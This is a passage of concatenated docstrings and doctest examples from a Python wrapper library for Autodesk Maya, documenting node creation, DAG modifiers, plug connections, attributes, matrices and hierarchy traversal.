... mod.connect(node1 + ".translate", node2 + ".translate")
...
>>> getAttr(node1 + ".translateX")
1.0
>>> node2["translate"][0]
1.0
>>> node2["translate"][1]
2.0
>>> with DagModifier() as mod:
... node1 = mod.createNode("transform")
... node2 = mod.createNode("transform", parent=node1)
... node1["translate"] = (5, 6, 7)
... node1["translate"] >> node2["translate"]
...
>>> node2["translate"][0]
5.0
>>> node2["translate"][1]
6.0
Example, without context manager:
>>> mod = DagModifier()
>>> parent = mod.createNode("transform")
>>> shape = mod.createNode("transform", parent=parent)
>>> mod.connect(parent["tz"], shape["tz"])
>>> mod.setAttr(parent["sx"], 2.0)
>>> parent["tx"] >> shape["ty"]
>>> parent["tx"] = 5.1
>>> round(shape["ty"], 1) # Not yet created nor connected
0.0
>>> mod.doIt()
>>> round(shape["ty"], 1)
5.1
>>> round(parent["sx"])
2.0
Duplicate names are resolved, even though nodes haven't yet been created:
>>> _ = cmds.file(new=True, force=True)
>>> with DagModifier() as mod:
... node = mod.createNode("transform", name="NotUnique")
... node1 = mod.createNode("transform", name="NotUnique")
... node2 = mod.createNode("transform", name="NotUnique")
...
>>> node.name() == "NotUnique"
True
>>> node1.name() == "NotUnique1"
True
>>> node2.name() == "NotUnique2"
True
Deletion works too
>>> _ = cmds.file(new=True, force=True)
>>> mod = DagModifier()
>>> parent = mod.createNode("transform", name="myParent")
>>> child = mod.createNode("transform", name="myChild", parent=parent)
>>> mod.doIt()
>>> "myParent" in cmds.ls()
True
>>> "myChild" in cmds.ls()
True
>>> parent.child().name()
u'myChild'
>>> mod = DagModifier()
>>> _ = mod.delete(child)
>>> mod.doIt()
>>> parent.child() is None
True
>>> "myChild" in cmds.ls()
False
A Maya DAG node
The difference between this and Node is that a DagNode
can have one or more children and one parent (multiple
parents not supported).
Example:
>>> _ = cmds.file(new=True, force=True)
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> child.parent() == parent
True
>>> next(parent.children()) == child
True
>>> parent.child() == child
True
>>> sibling = createNode("transform", parent=parent)
>>> child.sibling() == sibling
True
>>> shape = createNode("mesh", parent=child)
>>> child.shape() == shape
True
>>> shape.parent() == child
True
Abstract baseclass for a Maya DG node
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
Visual divider in channel box
Abstract baseclass for a Maya locator
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
A Maya dependency node
Example:
>>> _ = cmds.file(new=True, force=True)
>>> decompose = createNode("decomposeMatrix", name="decompose")
>>> str(decompose)
'decompose'
>>> alias = encode(decompose.name())
>>> decompose == alias
True
>>> transform = createNode("transform")
>>> transform["tx"] = 5
>>> transform["worldMatrix"][0] >> decompose["inputMatrix"]
>>> decompose["outputTranslate"]
(5.0, 0.0, 0.0)
Support set-type operations on Maya sets
Caveats
1. MFnSet was introduced in Maya 2016, this class backports
that behaviour for Maya 2015 SP3
2. Adding a DAG node as a DG node persists its function set
such that when you query it, it'll return the name rather
than the path.
Therefore, when adding a node to an object set, it's important
that it is added as either a DAG or DG node, depending on what it is.
This class manages this automatically.
Maya's MPoint
Maya's MQuaternion
Example:
>>> q = Quaternion(0, 0, 0, 1)
>>> v = Vector(1, 2, 3)
>>> isinstance(q * v, Vector)
True
Re-use previous instances of Node
Cost: 14 microseconds
This enables persistent state of each node, even when
a node is discovered at a later time, such as via
:func:`DagNode.parent()` or :func:`DagNode.descendents()`
Arguments:
mobject (MObject): Maya API object to wrap
exists (bool, optional): Whether or not to search for
an existing Python instance of this node
Example:
>>> nodeA = createNode("transform", name="myNode")
>>> nodeB = createNode("transform", parent=nodeA)
>>> encode("|myNode") is nodeA
True
>>> nodeB.parent() is nodeA
True
Abstract baseclass for a Maya shape
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
Abstract baseclass for a Maya shape
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
A more readable version of Maya's MTransformationMatrix
Added:
- Takes tuples/lists in place of MVector and other native types
- Support for multiplication
- Support for getting individual axes
- Support for direct access to the quaternion
Arguments:
matrix (Matrix, TransformationMatrix, optional): Original constructor
translate (tuple, Vector, optional): Initial translate value
rotate (tuple, Vector, optional): Initial rotate value
scale (tuple, Vector, optional): Initial scale value
Maya's MVector
Example:
>>> vec = Vector(1, 0, 0)
>>> vec * Vector(0, 1, 0) # Dot product
0.0
>>> vec ^ Vector(0, 1, 0) # Cross product
maya.api.OpenMaya.MVector(0, 0, 1)
Interactively edit an existing scenegraph with support for undo/redo
Arguments:
undoable (bool, optional): Put undoIt on the undo queue
interesting (bool, optional): New nodes should appear
in the channelbox
debug (bool, optional): Include additional debug data,
at the expense of performance
atomic (bool, optional): Automatically rollback changes on failure
template (str, optional): Automatically name new nodes using
this template
Facilitate use of isinstance(space, _Space)
Facilitate use of isinstance(space, _Type)
A Maya unit, for unit-attributes such as Angle and Distance
Because the resulting classes are subclasses of `int`, there
is virtually no run-time performance penalty to using it as
an integer. No additional Python is called, most notably when
passing the integer class to the Maya C++ binding (which wouldn't
call our overridden methods anyway).
The added overhead to import time is negligible.
Tuple of points to MObject suitable for nurbsCurve-typed data
Arguments:
points (tuple): (x, y, z) tuples per point
degree (int, optional): Defaults to 1 for linear
form (int, optional): Defaults to MFnNurbsCurve.kOpen,
also available kClosed
Example:
Create a new nurbs curve like this.
>>> data = NurbsCurveData(
... points=(
... (0, 0, 0),
... (0, 1, 0),
... (0, 2, 0),
... ))
...
>>> parent = createNode("transform")
>>> shape = createNode("nurbsCurve", parent=parent)
>>> shape["cached"] = data
Unlike other time units, this can be modified by the user at run-time
Return absolute value of plug
Example:
>>> node = createNode("transform")
>>> node["tx"] = -10
>>> abs(node["tx"])
10.0
Support legacy + '.attr' behavior
Example:
>>> node = createNode("transform")
>>> getAttr(node + ".tx")
0.0
>>> delete(node)
Support legacy add string to plug
Note:
Adding to short name is faster, e.g. node["t"] + "x",
than adding to longName, e.g. node["translate"] + "X"
Example:
>>> node = createNode("transform")
>>> node["tx"] = 5
>>> node["translate"] + "X"
5.0
>>> node["t"] + "x"
5.0
>>> try:
... node["t"] + node["r"]
... except TypeError:
... error = True
...
>>> error
True
if plug:
Example:
>>> node = createNode("transform")
>>> node["tx"] = 10
>>> if node["tx"]:
... True
...
True
Native API 2.0 MMatrix does not support indexing
API 1.0 however *does*, except only for elements
and not rows. Screw both of those, indexing isn't hard.
Arguments:
item (int, tuple): 1 integer for row, 2 for element
Identity/default matrix:
[[1.0, 0.0, 0.0, 0.0]]
[[0.0, 1.0, 0.0, 0.0]]
[[0.0, 0.0, 1.0, 0.0]]
[[0.0, 0.0, 0.0, 1.0]]
Example:
>>> m = MatrixType()
>>> m(0, 0)
1.0
>>> m(0, 1)
0.0
>>> m(1, 1)
1.0
>>> m(2, 1)
0.0
>>> m(3, 3)
1.0
>>>
>>> m(0)
(1.0, 0.0, 0.0, 0.0)
Does the attribute `other` exist?
Python 2.x division
Example:
>>> node = createNode("transform")
>>> node["tx"] = 5
>>> node["ty"] = 2
>>> node["tx"] / node["ty"]
2.5
MObject supports this operator explicitly
Compare plug to `other`
Example:
>>> node = createNode("transform")
>>> node["visibility"] == True
True
>>> node["visibility"] == node["nodeState"]
False
>>> node["visibility"] != node["nodeState"]
True
Return plug as floating point value
Example:
>>> node = createNode("transform")
>>> float(node["visibility"])
1.0
Disconnect attribute via A // B
Example:
>>> nodeA = createNode("transform")
>>> nodeB = createNode("transform")
>>> nodeA["tx"] >> nodeB["tx"]
>>> nodeA["tx"] = 5
>>> nodeB["tx"] == 5
True
>>> nodeA["tx"] // nodeB["tx"]
>>> nodeA["tx"] = 0
>>> nodeB["tx"] == 5
True
Get plug from self
Arguments:
key (str, tuple): String lookup of attribute,
optionally pass tuple to include unit.
Example:
>>> node = createNode("transform")
>>> node["translate"] = (1, 1, 1)
>>> node["translate", Meters]
(0.01, 0.01, 0.01)
Read from child of array or compound plug
Arguments:
index (int): Logical index of plug (NOT physical, make note)
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="mynode")
>>> node["translate"][0].read()
0.0
>>> node["visibility"][0]
Traceback (most recent call last):
...
TypeError: |mynode.visibility does not support indexing
>>> node["translate"][2] = 5.1
>>> node["translate"][2].read()
5.1
Support storing in set()
Support += operator, for .append()
Example:
>>> node = createNode("transform")
>>> node["myArray"] = Double(array=True)
>>> node["myArray"].append(1.0)
>>> node["myArray"].extend([2.0, 3.0])
>>> node["myArray"] += 5.1
>>> node["myArray"] += [1.1, 2.3, 999.0]
>>> node["myArray"][0]
1.0
>>> node["myArray"][6]
999.0
>>> node["myArray"][-1]
999.0
Initialise Node
Private members:
mobject (om.MObject): Wrap this MObject
fn (om.MFnDependencyNode): The corresponding function set
modifier (om.MDagModifier, optional): Operations are
deferred to this modifier.
destroyed (bool): Has this node been destroyed by Maya?
state (dict): Optional state for performance
A Maya plug
Arguments:
node (Node): Parent Node of plug
mplug (maya.api.OpenMaya.MPlug): Internal Maya plug
unit (int, optional): Unit with which to read plug
Context for evaluating the Maya DG
Extension of MDGContext to also accept time as a float. In Maya 2018
and above DGContext can also be used as a context manager.
Arguments:
time (float, om.MTime, optional): Time at which to evaluate context
Return plug as int
Example:
>>> node = createNode("transform")
>>> int(node["visibility"])
1
Iterate over value as a tuple
Example:
>>> node = createNode("transform")
>>> node["translate"] = (0, 1, 2)
>>> for index, axis in enumerate(node["translate"]):
... assert axis == float(index)
... assert isinstance(axis, Plug)
...
>>> a = createNode("transform")
>>> a["myArray"] = Message(array=True)
>>> b = createNode("transform")
>>> c = createNode("transform")
>>> a["myArray"][0] << b["message"]
>>> a["myArray"][1] << c["message"]
>>> a["myArray"][0] in list(a["myArray"])
True
>>> a["myArray"][1] in list(a["myArray"])
True
>>> for single in node["visibility"]:
... print(single)
...
True
>>> node = createNode("wtAddMatrix")
>>> node["wtMatrix"][0]["weightIn"] = 1.0
Support connecting attributes via A << B
Negate unary operator
Example:
>>> node = createNode("transform")
>>> node["visibility"] = 1
>>> -node["visibility"]
-1
Support for using name of assignment
Example:
node["thisName"] = cmdx.Double()
In this example, the attribute isn't given a `name`
Instead, the name is inferred from where it is assigned.
Avoid repr depicting the full contents of this dict
Support connecting attributes via A >> B
Support item assignment of new attributes or values
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="myNode")
>>> node["myAttr"] = Double(default=1.0)
>>> node["myAttr"] == 1.0
True
>>> node["rotateX", Degrees] = 1.0
>>> node["rotateX"] = Degrees(1)
>>> node["rotateX", Degrees]
1.0
>>> node["myDist"] = Distance()
>>> node["myDist"] = node["translateX"]
>>> node["myDist", Centimeters] = node["translateX", Meters]
>>> round(node["rotateX", Radians], 3)
0.017
>>> node["myDist"] = Distance()
Traceback (most recent call last):
...
ExistError: myDist
>>> node["notExist"] = 5
Traceback (most recent call last):
...
ExistError: |myNode.notExist
>>> delete(node)
Write to child of array or compound plug
Example:
>>> node = createNode("transform")
>>> node["translate"][0] = 5
>>> node["tx"]
5.0
Return value as str
Example:
>>> node = createNode("transform")
>>> str(node["tx"])
'0.0'
Float division, e.g. self / other
Convert `path` to Maya API 1.0 MObject
Arguments:
path (str): Absolute or relative path to DAG or DG node
Raises:
ExistError on `path` not existing
Convert `path` to Maya API 1.0 MObject
Arguments:
path (str): Absolute or relative path to DAG or DG node
Raises:
ExistError on `path` not existing
Find default value from plug, regardless of attribute type
Convert native `plug` to Python type
Arguments:
plug (om.MPlug): Native Maya plug
unit (int, optional): Return value in this unit, e.g. Meters
context (om.MDGContext, optional): Return value in this context
Convert `value` into a suitable equivalent for om.MDGModifier
Arguments:
value (object): Value of any type to write into modifier
plug (Plug): Plug within which to write value
mod (om.MDGModifier): Modifier to use for writing it
Pass value of `value` to `plug`
Arguments:
value (any): Instance of Python or Maya type
plug (Plug): Target plug to which value is applied
Add single `member` to set
Arguments:
member (cmdx.Node): Node to add
Convenience method for .append(Callback())
Add new attribute to `node`
Arguments:
node (Node): Add attribute to this node
longName (str): Name of resulting attribute
attributeType (str): Type of attribute, e.g. `string`
shortName (str, optional): Alternate name of attribute
enumName (str, optional): Options for an enum attribute
defaultValue (any, optional): Default value of attribute
Example:
>>> node = createNode("transform")
>>> addAttr(node, "myString", attributeType="string")
>>> addAttr(node, "myDouble", attributeType=Double)
Add a new dynamic attribute to node
Arguments:
attr (Plug): Add this attribute
Example:
>>> node = createNode("transform")
>>> attr = Double("myAttr", default=5.0)
>>> node.addAttr(attr)
>>> node["myAttr"] == 5.0
True
Add `child` to self
Arguments:
child (Node): Child to add
index (int, optional): Physical location in hierarchy,
defaults to cmdx.Last
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform")
>>> parent.addChild(child)
Add metaclass to Python 2 and 3 class
Helper decorator, from six.py
Add `value` to end of self, which is an array
Arguments:
value (object): If value, create a new entry and append it.
If cmdx.Plug, create a new entry and connect it.
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="appendTest")
>>> node["myArray"] = Double(array=True)
>>> node["myArray"].append(1.0)
>>> node["notArray"] = Double()
>>> node["notArray"].append(2.0)
Traceback (most recent call last):
...
TypeError: "|appendTest.notArray" was not an array attribute
Return plug as double (Python float)
Example:
>>> node = createNode("transform")
>>> node["translateX"] = 5.0
>>> node["translateX"].asDouble()
5.0
Return a given hashCode for `mobj`, without caching it
This can be helpful in case you wish to synchronise `cmdx`
with a third-party library or tool and wish to guarantee
that an identical algorithm is used.
Return a given hex string for `mobj`, without caching it
See docstring for :func:`asHash` for details
Return plug as MatrixType
Example:
>>> node1 = createNode("transform")
>>> node2 = createNode("transform", parent=node1)
>>> node1["translate"] = (0, 5, 0)
>>> node2["translate"] = (0, 5, 0)
>>> plug1 = node1["matrix"]
>>> plug2 = node2["worldMatrix"][0]
>>> mat1 = plug1.asMatrix()
>>> mat2 = plug2.asMatrix()
>>> mat = mat1 * mat2
>>> tm = TransformationMatrix(mat)
>>> list(tm.translation())
[0.0, 15.0, 0.0]
Return plug as TransformationMatrix
Example:
>>> node = createNode("transform")
>>> node["translateY"] = 12
>>> node["rotate"] = 1
>>> tm = node["matrix"].asTm()
>>> map(round, tm.rotation())
[1.0, 1.0, 1.0]
>>> list(tm.translation())
[0.0, 12.0, 0.0]
Return the top-level parent of node
Example:
>>> parent1 = createNode("transform")
>>> parent2 = createNode("transform")
>>> child = createNode("transform", parent=parent1)
>>> grandchild = createNode("transform", parent=child)
>>> child.assembly() == parent1
True
>>> parent2.assembly() == parent2
True
Return a cmdx.BoundingBox of this DAG node
Is the attribute visible in the Channel Box?
Return children of node
All returned children are transform nodes, as specified by the
`filter` argument. For shapes, use the :func:`shapes` method.
The `contains` argument only returns transform nodes containing
a shape of the type provided.
Arguments:
type (str, optional): Return only children that match this type
filter (int, optional): Return only children with this function set
contains (str, optional): Child must have a shape of this type
query (dict, optional): Limit output to nodes with these attributes
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", "a")
>>> b = createNode("transform", "b", parent=a)
>>> c = createNode("transform", "c", parent=a)
>>> d = createNode("mesh", "d", parent=c)
>>> list(a.children()) == [b, c]
True
>>> a.child() == b
True
>>> c.child(type="mesh")
>>> c.child(type="mesh", filter=None) == d
True
>>> c.child(type=("mesh", "transform"), filter=None) == d
True
>>> a.child() == b
True
>>> a.child(contains="mesh") == c
True
>>> a.child(contains="nurbsCurve") is None
True
>>> b["myAttr"] = Double(default=5)
>>> a.child(query=["myAttr"]) == b
True
>>> a.child(query=["noExist"]) is None
True
>>> a.child(query={"myAttr": 5}) == b
True
>>> a.child(query={"myAttr": 1}) is None
True
Remove all reused nodes
Clear transient state
A node may cache previously queried values for performance
at the expense of memory. This method erases any cached
values, freeing up memory at the expense of performance.
Example:
>>> node = createNode("transform")
>>> node["translateX"] = 5
>>> node["translateX"]
5.0
>>> # Plug was reused
>>> node["translateX"]
5.0
>>> # Value was reused
>>> node.clear()
>>> node["translateX"]
5.0
>>> # Plug and value was recomputed
Remove all members from set
Return a clone of self
A "clone" assigns the .outMesh attribute of a mesh node
to the `.inMesh` of the resulting clone.
Supports:
- mesh
Arguments:
name (str, optional): Name of newly created clone
parent (DagNode, optional): Parent to newly cloned node
worldspace (bool, optional): Translate output to worldspace
Commit `undo` and `redo` to history
Arguments:
undo (func): Call this function on next undo
redo (func, optional): Like `undo`, but for redo
Connect `src` to `dst`
Arguments:
src (Plug): Source plug
dst (Plug): Destination plug
Example:
>>> src = createNode("transform")
>>> dst = createNode("transform")
>>> connectAttr(src + ".rotateX", dst + ".scaleY")
Return whether or not this attribute is connected (to anything)
Singular version of :func:`connections()`
Return first connection from :func:`connections()`
Yield plugs of node with a connection to any other plug
Arguments:
unit (int, optional): Return plug in this unit,
e.g. Meters or Radians
type (str, optional): Restrict output to nodes of this type,
e.g. "transform" or "mesh"
plugs (bool, optional): Return plugs, rather than nodes
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", name="A")
>>> b = createNode("multDoubleLinear", name="B")
>>> a["ihi"] << b["ihi"]
>>> list(a.connections()) == [b]
True
>>> list(b.connections()) == [a]
True
>>> a.connection() == b
True
Yield plugs connected to self
Arguments:
type (int, optional): Only return nodes of this type
source (bool, optional): Return source plugs,
default is True
destination (bool, optional): Return destination plugs,
default is True
plugs (bool, optional): Return connected plugs instead of nodes
unit (int, optional): Return plug in this unit, e.g. Meters
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", name="A")
>>> b = createNode("multDoubleLinear", name="B")
>>> a["ihi"] << b["ihi"]
>>> a["ihi"].connection() == b
True
>>> b["ihi"].connection() == a
True
>>> a["ihi"]
2
Create a new node
This function forms the basic building block
with which to create new nodes in Maya.
.. note:: Missing arguments `shared` and `skipSelect`
.. tip:: For additional performance, `type` may be given as an MTypeId
Arguments:
type (str): Type name of new node, e.g. "transform"
name (str, optional): Sets the name of the newly-created node
parent (Node, optional): Specifies the parent in the DAG under which
the new node belongs
Example:
>>> node = createNode("transform") # Type as string
>>> node = createNode(tTransform) # Type as ID
Create a NURBS curve from a series of points
Arguments:
parent (DagNode): Parent to resulting shape node
points (list): One tuples per point, with 3 floats each
degree (int, optional): Degree of curve, 1 is linear
form (int, optional): Whether to close the curve or not
Example:
>>> parent = createNode("transform")
>>> shape = curve(parent, [
... (0, 0, 0),
... (0, 1, 0),
... (0, 2, 0),
... ])
...
Return a om.MDagPath for this node
Example:
>>> _ = cmds.file(new=True, force=True)
>>> parent = createNode("transform", name="Parent")
>>> child = createNode("transform", name="Child", parent=parent)
>>> path = child.dagPath()
>>> str(path)
'Child'
>>> str(path.pop())
'Parent'
Special handling for data stored in the instance
Normally, the initialisation of data could happen in the __init__,
but for some reason the postConstructor of a custom plug-in calls
__init__ twice for every unique hex, which causes any data added
there to be wiped out once the postConstructor is done.
Convert cmdx Node to shortest unique path
This is the same as `node.shortestPath()`
To get an absolute path, use `node.path()`
Return default value of plug
Return one of three available values
Resolution order:
1. Argument
2. Node default (from cls.defaults)
3. Attribute default
Delete `attr` from node
Arguments:
attr (Plug): Attribute to remove
Example:
>>> node = createNode("transform")
>>> node["myAttr"] = Double()
>>> node.deleteAttr("myAttr")
>>> node.hasAttr("myAttr")
False
Singular version of :func:`descendents()`
A recursive, depth-first search.
.. code-block:: python
a
|
b---d
| |
c e
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", "a")
>>> b = createNode("transform", "b", parent=a)
>>> c = createNode("transform", "c", parent=b)
>>> d = createNode("transform", "d", parent=b)
>>> e = createNode("transform", "e", parent=d)
>>> a.descendent() == a.child()
True
>>> list(a.descendents()) == [b, c, d, e]
True
>>> f = createNode("mesh", "f", parent=e)
>>> list(a.descendents(type="mesh")) == [f]
True
Return the first descendent
Return hierarchy of objects in set
Faster and more efficient dependency graph traversal
Requires Maya 2017+
Example:
>>> grandparent = createNode("transform")
>>> parent = createNode("transform", parent=grandparent)
>>> child = createNode("transform", parent=parent)
>>> mesh = createNode("mesh", parent=child)
>>> it = grandparent.descendents(type=tMesh)
>>> next(it) == mesh
True
>>> next(it)
Traceback (most recent call last):
...
StopIteration
Recursive, depth-first search; compliant with MItDag of 2017+
Example:
>>> grandparent = createNode("transform")
>>> parent = createNode("transform", parent=grandparent)
>>> child = createNode("transform", parent=parent)
>>> mesh = createNode("mesh", parent=child)
>>> it = grandparent.descendents(type=tMesh)
>>> next(it) == mesh
True
>>> next(it)
Traceback (most recent call last):
...
StopIteration
Disconnect self from `other`
Arguments:
other (Plug, optional): If none is provided, disconnect everything
Example:
>>> node1 = createNode("transform")
>>> node2 = createNode("transform")
>>> node2["tx"].connection() is None
True
>>> node2["ty"].connection() is None
True
>>>
>>> node2["tx"] << node1["tx"]
>>> node2["ty"] << node1["ty"]
>>> node2["ty"].connection() is None
False
>>> node2["tx"].connection() is None
False
>>>
>>> node2["tx"].disconnect(node1["tx"])
>>> node2["ty"].disconnect()
>>> node2["tx"].connection() is None
True
>>> node2["ty"].connection() is None
True
Disconnect `a` from `b`
Arguments:
a (Plug): Starting point of a connection
b (Plug, optional): End point of a connection, defaults to all
source (bool, optional): Disconnect b, if it is a source
destination (bool, optional): Disconnect b, if it is a destination
Normally, Maya only performs a disconnect if the
connection is incoming. Bidirectional
disconnect(A, B) => OK
__________ _________
| | | |
| nodeA o---->o nodeB |
|__________| |_________|
disconnect(B, A) => NO
__________ _________
| | | |
| nodeA o---->o nodeB |
|__________| |_________|
Return dictionary of all attributes
Example:
>>> import json
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("choice")
>>> dump = node.dump()
>>> isinstance(dump, dict)
True
>>> dump["choice1.caching"]
False
Return a JSON compatible dictionary of all attributes
Return a duplicate of self
Convert relative or absolute `path` to cmdx Node
Fastest conversion from absolute path to Node
Arguments:
path (str): Absolute or relative path to DAG or DG node
The node exists in both memory *and* scene
Example:
>>> node = createNode("joint")
>>> node.exists
True
>>> cmds.delete(str(node))
>>> node.exists
False
>>> node.destroyed
False
>>> _ = cmds.file(new=True, force=True)
>>> node.exists
False
>>> node.destroyed
True
Append multiple values to the end of an array
Arguments:
values (tuple): If values, create a new entry and append it.
If cmdx.Plug's, create a new entry and connect it.
Example:
>>> node = createNode("transform")
>>> node["myArray"] = Double(array=True)
>>> node["myArray"].extend([1.0, 2.0, 3.0])
>>> node["myArray"][0]
1.0
>>> node["myArray"][-1]
3.0
Cache previously found plugs, for performance
Cost: 4.9 microseconds/call
Part of the time taken in querying an attribute is the
act of finding a plug given its name as a string.
This causes a 25% reduction in time taken for repeated
attribute queries. Though keep in mind that state is stored
in the `cmdx` object which currently does not survive rediscovery.
That is, if a node is created and later discovered through a call
to `encode`, then the original and discovered nodes carry one
state each.
Additional challenges include storing the same plug for both
long and short name of said attribute, which is currently not
the case.
Arguments:
name (str): Name of plug to find
cached (bool, optional): Return cached plug, or
throw an exception. Default to False, which
means it will run Maya's findPlug() and cache
the result.
safe (bool, optional): Always find the plug through
Maya's API, defaults to False. This will not perform
any caching and is intended for use during debugging
to spot whether caching is causing trouble.
Example:
>>> node = createNode("transform")
>>> node.findPlug("translateX", cached=True)
Traceback (most recent call last):
...
KeyError: "'translateX' not cached"
>>> plug1 = node.findPlug("translateX")
>>> isinstance(plug1, om.MPlug)
True
>>> plug1 is node.findPlug("translateX")
True
>>> plug1 is node.findPlug("translateX", cached=True)
True
Find the original class of a plug-in by `name`
Return first member of an `iterator`
Example:
>>> def it():
... yield 1
... yield 2
... yield 3
...
>>> first(it())
1
Return members, converting nested object sets into its members
Example:
>>> from maya import cmds
>>> _ = cmds.file(new=True, force=True)
>>> a = cmds.createNode("transform", name="a")
>>> b = cmds.createNode("transform", name="b")
>>> c = cmds.createNode("transform", name="c")
>>> cmds.select(a)
>>> gc = cmds.sets([a], name="grandchild")
>>> cc = cmds.sets([gc, b], name="child")
>>> parent = cmds.sets([cc, c], name="parent")
>>> mainset = encode(parent)
>>> sorted(mainset.flatten(), key=lambda n: n.name())
[|a, |b, |c]
Get existing node from MObjectHandle.hashCode()
Get existing node from Node.hex
Read `attr`
Arguments:
attr (Plug): Attribute as a cmdx.Plug
type (str, optional): Unused
time (float, optional): Time at which to evaluate the attribute
Example:
>>> node = createNode("transform")
>>> getAttr(node + ".translateX")
0.0
Return whether or not `attr` exists
Arguments:
attr (str): Name of attribute to check
Example:
>>> node = createNode("transform")
>>> node.hasAttr("mysteryAttribute")
False
>>> node.hasAttr("translateX")
True
>>> node["myAttr"] = Double() # Dynamic attribute
>>> node.hasAttr("myAttr")
True
Return MObjectHandle.hashCode of this node
This a guaranteed-unique integer (long in Python 2)
similar to the UUID of Maya 2016
Return unique hashCode as hexadecimal string
Example:
>>> node = createNode("transform")
>>> node.hexStr == format(node.hashCode, "x")
True
Set visibility to False
Hide attribute from channel box
Note: An attribute cannot be hidden from the channel box
and keyable at the same time. Therefore, this method
also makes the attribute non-keyable.
Supports array and compound attributes too.
Load this shared as a plug-in
Call this prior to using the shared
Return the current plug-in instance of this node
Evaluate whether self is of `type`
Arguments:
type (int): MFn function set constant
Example:
>>> node = createNode("transform")
>>> node.isA(kTransform)
True
>>> node.isA(kShape)
False
The node exists somewhere in memory
Is the attribute keyable?
Return last member of an `iterator`
Example:
>>> def it():
... yield 1
... yield 2
... yield 3
...
>>> last(it())
3
Return the number of parents this DAG node has
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> child.level
1
>>> parent.level
0
List connections of `attr`
Arguments:
attr (Plug or Node):
Example:
>>> node1 = createNode("transform")
>>> node2 = createNode("mesh", parent=node1)
>>> node1["v"] >> node2["v"]
>>> listConnections(node1) == [node2]
True
>>> listConnections(node1 + ".v") == [node2]
True
>>> listConnections(node1["v"]) == [node2]
True
>>> listConnections(node2) == [node1]
True
List relatives of `node`
Arguments:
node (DagNode): Node to enquire about
type (int, optional): Only return nodes of this type
children (bool, optional): Return children of `node`
parent (bool, optional): Return parent of `node`
shapes (bool, optional): Return only children that are shapes
allDescendents (bool, optional): Return descendents of `node`
fullPath (bool, optional): Unused; nodes are always exact
path (bool, optional): Unused; nodes are always exact
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> listRelatives(child, parent=True) == [parent]
True
Lock attribute
Build a (left-handed) look-at matrix
See glm::glc::matrix_transform::lookAt for reference
+ Z (up)
/
/
(origin) o------ + X (center)
+ Y
Arguments:
origin (Vector): Starting position
center (Vector): Point towards this
up (Vector, optional): Up facing this way, defaults to Y-up
Example:
>>> mat = lookAt(
... (0, 0, 0), # Relative the origin..
... (1, 0, 0), # X-axis points towards global X
... (0, 1, 0) # Z-axis points towards global Y
... )
>>> tm = Tm(mat)
>>> int(degrees(tm.rotation().x))
-90
Return TransformationMatrix of `other` relative self
Example:
>>> a = createNode("transform")
>>> b = createNode("transform")
>>> a["translate"] = (0, 5, 0)
>>> b["translate"] = (0, -5, 0)
>>> delta = a.mapFrom(b)
>>> delta.translation()[1]
10.0
>>> a = createNode("transform")
>>> b = createNode("transform")
>>> a["translate"] = (0, 5, 0)
>>> b["translate"] = (0, -15, 0)
>>> delta = a.mapFrom(b)
>>> delta.translation()[1]
20.0
Return TransformationMatrix of self relative `other`
See :func:`mapFrom` for examples.
Return the first member
Centimeters (Maya's default unit) to Meters
Example:
>>> meters(100)
1.0
Return the name of this node
Arguments:
namespace (bool, optional): Return with namespace,
defaults to False
Example:
>>> node = createNode("transform", name="myName")
>>> node.name()
u'myName'
Get namespace of node
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="myNode")
>>> node.namespace()
u''
>>> _ = cmds.namespace(add=":A")
>>> _ = cmds.namespace(add=":A:B")
>>> node = createNode("transform", name=":A:B:myNode")
>>> node.namespace()
u'A:B'
Return MObject of this node
Return parent of node
Arguments:
type (str, optional): Return parent, only if it matches this type
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> child.parent() == parent
True
>>> not child.parent(type="camera")
True
>>> parent.parent()
Return full path to node
Example:
>>> parent = createNode("transform", "myParent")
>>> child = createNode("transform", "myChild", parent=parent)
>>> child.name()
u'myChild'
>>> child.path()
u'|myParent|myChild'
Return the user-defined class of the plug-in behind this node
Delete an attribute
Arguments:
key (str): Name of attribute to delete
Example:
>>> node = createNode("transform")
>>> node["myAttr"] = Double()
>>> node.pop("myAttr")
>>> node.hasAttr("myAttr")
False
Prevent fatal crashes from illegal access to deleted nodes
Return transformation matrix as a Quaternion
Read attribute value
Arguments:
unit (int, optional): Unit with which to read plug
time (float, optional): Time at which to read plug
Example:
>>> node = createNode("transform")
>>> node["ty"] = 100.0
>>> node["ty"].read()
100.0
>>> node["ty"].read(unit=Meters)
1.0
Read from MDataHandle
Restore plug to default value
Handle arguments conveniently
- Allow for optional `space` argument
- Automatically convert tuple to Vector
Arguments:
rot (Vector, Quaternion): Rotation to add
This method does not typically support optional arguments
This method does not typically support optional arguments
Write `value` to `attr`
Arguments:
attr (Plug): Existing attribute to edit
value (any): Value to write
type (int, optional): Unused
Example:
>>> node = createNode("transform")
>>> setAttr(node + ".translateX", 5.0)
Interpret three values as an euler rotation
This method does not typically support optional arguments
Return shortest unique path to node
